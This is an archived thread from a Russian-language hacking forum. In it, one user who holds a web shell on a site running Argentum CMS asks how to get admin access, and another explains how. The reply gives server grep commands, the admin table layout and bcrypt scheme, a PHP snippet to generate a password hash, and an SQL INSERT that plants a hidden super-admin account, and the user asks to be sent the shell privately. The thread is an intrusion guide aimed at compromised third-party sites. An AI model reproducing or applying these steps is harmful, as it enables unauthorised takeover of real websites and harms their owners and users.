Вход

Просмотр полной версии : Argentum CMS


Unknowhacker
08.06.2015, 21:36
В общем есть шелл на данном типе движка доступ к зарегистрированным пользователям. Но данные под панель администрирования не подходят. И собственно вопрос, где хранятся данные админ пользователей данного движка?

faza02
08.06.2015, 22:22
это просто студия, которая клепает сайты. http://argentum.ua/ru/portfolio

если нет в базе, значит лежат где-нибудь в файле

Unknowhacker
09.06.2015, 15:28
Я встречал на многих сайтах, что данные админа как правило находились в скрипте панели администрирования.

Вот я зашёл сюда /.../cpanel

http://s001.radikal.ru/i195/1506/90/f1e04b4c6e7a.jpg

А дальше где искать, уже все тут конфиги перерыл. Народ, подскажите!

P.S Данные db_user - не подходят!

faza02
09.06.2015, 15:34
↑ (https://antichat.live/posts/3857078/)
Я встречал на многих сайтах, что данные админа как правило находились в скрипте панели администрирования.
Вот я зашёл сюда
/.../cpanel
http://s001.radikal.ru/i195/1506/90/f1e04b4c6e7a.jpg
А дальше где искать, уже все тут конфиги перерыл. Народ, подскажите!
P.S
Данные db_user - не подходят!


шелл в лс

faza02
09.06.2015, 16:52
я сначала начал искать по файлам всяческими find и grep, а потом все же решил перепроверить.

есть там такая таблица: sf_admin_user, в ней такие колонки:


id group_id username password full_name email created_at last_activity is_active is_super_admin

так вот в cpanel пускает, если is_super_admin = 1.

пароли там через функцию http://php.net/manual/ru/function.password-hash.php

ищем файл:


grep --exclude=*.o -rnw '/var/www/***/' -e "PASSWORD_BCRYPT"
/var/www/***/plugins/sfArgentumCMSPlugin/lib/password.php:12: define('PASSWORD_BCRYPT', 1);
/var/www/***/plugins/sfArgentumCMSPlugin/lib/password.php:13: define('PASSWORD_DEFAULT', PASSWORD_BCRYPT);
/var/www/***/plugins/sfArgentumCMSPlugin/lib/password.php:38: case PASSWORD_BCRYPT:
/var/www/***/plugins/sfArgentumCMSPlugin/lib/password.php:159: $return['algo'] = PASSWORD_BCRYPT;
/var/www/***/plugins/sfArgentumCMSPlugin/lib/password.php:184: case PASSWORD_BCRYPT:



switch ($algo) {
casePASSWORD_BCRYPT:
$cost= isset($options['cost']) ?$options['cost'] :10;
if ($cost!=$info['options']['cost']) {
returntrue ;

bcrypt, cost = 10

генерируем пасс себе


10,
];
echo password_hash("pass", PASSWORD_BCRYPT, $options)."\n";
?>

$2a$10$Fnz2ze0gI7SYofxsluTrluK3GEQiFGS2Oy4kEbBo816 yEvRWHFGKS

добавим себя в базу:


INSERT INTO sf_admin_user (id, group_id, username, password, full_name, email, created_at, last_activity, is_active, is_super_admin) VALUES (667, 1, "antichat1", "$2a$10$Fnz2ze0gI7SYofxsluTrluK3GEQiFGS2Oy4kEbBo816 yEvRWHFGKS", "lol1", "lol@lol.ru1", "2010-10-10 17:29:54", "2013-04-05 22:05:38", 1, 1);

готово, логинимся: ***/cpanel/

Unknowhacker
10.06.2015, 02:04
Что-то я не понял, я создал пхп-скрипт ввёл код.


10,
];
echo password_hash("pass", PASSWORD_BCRYPT, $options)."\n";
?>

Сохраняю, обновляю страницу - белый экран. (Кодировка UTF-8)

faza02
10.06.2015, 02:20
↑ (https://antichat.live/posts/3857282/)
Что-то я не понял, я создал пхп-скрипт ввёл код.

10,
];
echo password_hash("pass", PASSWORD_BCRYPT, $options)."\n";
?>

Сохраняю, обновляю страницу - белый экран. (Кодировка UTF-8)


https://www.dailycred.com/article/bcrypt-calculator